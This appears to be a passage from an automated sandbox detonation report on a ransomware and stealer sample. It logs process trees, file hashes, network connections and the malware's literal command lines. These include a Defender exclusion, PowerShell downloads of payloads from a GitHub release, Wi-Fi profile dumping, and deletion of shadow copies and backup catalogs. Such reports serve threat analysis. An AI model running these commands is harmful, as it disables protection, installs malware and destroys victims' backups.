PID 2816 wrote to memory of 2796 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1620 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 1620 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 1620 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1620 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1620 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1620 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1348 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 3192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2816 wrote to memory of 3192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2816 wrote to memory of 3192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2816 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2816 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2816 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2816 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2816 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2816 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1660 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1660 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1660 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1660 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1660 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5028 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 5028 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2132 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2132 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 3292 wrote to memory of 4480 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3292 wrote to memory of 4480 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3292 wrote to memory of 5048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3292 wrote to memory of 5048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2752 wrote to memory of 2608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2752 wrote to memory of 2608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2752 wrote to memory of 4300 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2752 wrote to memory of 4300 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2132 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2132 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 3448 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 3448 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2132 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\NOTEPAD.EXE
PID 2132 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\NOTEPAD.EXE

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\473A.tmp\473B.tmp\473C.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1348 -ip 1348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 2432

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 github.com udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp

Files

memory/4024-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\473A.tmp\473B.tmp\473C.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512 a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

memory/2300-3-0x00007FF8AA7A3000-0x00007FF8AA7A5000-memory.dmp

memory/2300-13-0x000001B0C8C50000-0x000001B0C8C72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_th5qeduo.rpf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2300-14-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

memory/2300-15-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

memory/2300-18-0x000001B0C8C90000-0x000001B0C8EAC000-memory.dmp

memory/2300-19-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a15743cd087226baafa094c9aed07dc4
SHA1 2124cf2ac13da80b2e3cd37d3eab477261771423
SHA256 4211b5503de68413f5605cbeec4a49fb46fbec44c58df95be892f0dc308a39cf
SHA512 301e82e45c3e190bdbc1316cda1cd735434c5aa873a57322e807c7cf4c23e006e11a7347ebb0f8afed181d3a4d860202cbd6fc721b9970296c7a4b1a367805a7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cd004cc33018d8896d50aea753fc075b
SHA1 063cf59c31ebca6e33d29d6e3062ef283c817924
SHA256 9e20a2341322632495af9aa46cfa78edeaa23bb1c72b948726eb9110ca6b22fb
SHA512 1fe32b73d8fab9aedf89de7b829f57087ec03718bd164303cf891e6d5804fc9a2bc16b485790bda90526fc8942b7edc7d0a567a8299ab879fe41376df71a445a

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 7605fb5c749eeea0b1b27fdaad78051c
SHA1 28388bf016af085bbcbacf8c516853942f6ec8d3
SHA256 466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA512 1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

MD5 b6054dbe4ed853c2e35291f045a632ba
SHA1 1355fbe1ea1f6bb566921f04512f78590c4b0e41
SHA256 b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4
SHA512 648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

memory/5028-50-0x0000000000A00000-0x0000000000A28000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f5819e4332bfe20b154ef800c2da35c3
SHA1 6076c9167103e32cb21b7ba51c99b2dc7fa55af7
SHA256 f5fe04be666d575a4eacc7ddbfb1b172c303f9a841eb98a82067bd4cfea7403b
SHA512 9c99e560ea789549c82e8264e2c438cc6bb12a8facff5673f6c5dbde30db4417b7d951b659d88481624823d3f1b24c5238817f2344b4a1b084dfc12bb95e7b50

memory/1348-62-0x00000000001F0000-0x000000000022C000-memory.dmp

memory/1348-64-0x0000000004A10000-0x0000000004A22000-memory.dmp

memory/4024-66-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1348-67-0x0000000004C00000-0x0000000004DC2000-memory.dmp

memory/1348-68-0x0000000005B80000-0x00000000060AC000-memory.dmp

memory/1348-69-0x0000000006570000-0x00000000065D6000-memory.dmp

memory/1348-70-0x0000000006780000-0x0000000006812000-memory.dmp

C:\Users\Admin\readme.txt

MD5 60d646f40556d78166ad8111d850fc51
SHA1 babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256 a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA512 3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

MD5 d1457b72c3fb323a2671125aef3eab5d
SHA1 5bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA256 8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512 ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

MD5 ea511fc534efd031f852fcf490b76104
SHA1 573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256 e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512 f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

MD5 d7d098677c341ae3eeb87981da76e427
SHA1 6a0909ca3adb29a1fb9265395be93b3538402024
SHA256 0fdfa0ce28a62e115f88672b865b1a4b60960485d43fb6d17ecb027c501388be
SHA512 0f5c428936690b0d1ecb68a81372caccc0c58e69d2b56d51d726ca1088a283a5631baf64b508f944f5871e387da8aca59f096b2fbc14f5583f8d6f6b7c33f4be

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-22 02:51

Reported

2025-03-22 02:53

Platform

win7-20250207-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2184 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2184 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2784 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2784 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2816 wrote to memory of 2804 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2816 wrote to memory of 2804 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2816 wrote to memory of 2804 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2784 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2784 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2784 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2784 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2784 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2784 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2784 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2784 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2784 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6789.tmp\678A.tmp\678B.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

Network

N/A

Files

memory/2184-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6789.tmp\678A.tmp\678B.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512 a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

memory/2928-7-0x000007FEF598E000-0x000007FEF598F000-memory.dmp

memory/2928-8-0x000000001B690000-0x000000001B972000-memory.dmp

memory/2928-9-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2928-10-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

memory/2928-11-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

memory/2928-13-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

memory/2928-12-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

memory/2928-14-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6753014d767e2b4a7aab6eb05a978b87
SHA1 913a5beb394a3d8944c32b417931a6a94d974cb5
SHA256 75162bf1827d9a8fa03f199d6a117f508837661bd1df2209c6b7339520ee9b28
SHA512 c8b5bf5151a9b2c5a7537d464e081964075c5f2360ecc2f47af3251949991104ffa2d1b0714bbae0d3139e8bd3835162bdde8d4aca04e53048ec920495595420

memory/2764-20-0x000000001B7B0000-0x000000001BA92000-memory.dmp

memory/2764-21-0x0000000001D10000-0x0000000001D18000-memory.dmp

memory/2184-27-0x0000000140000000-0x0000000140028000-memory.dmp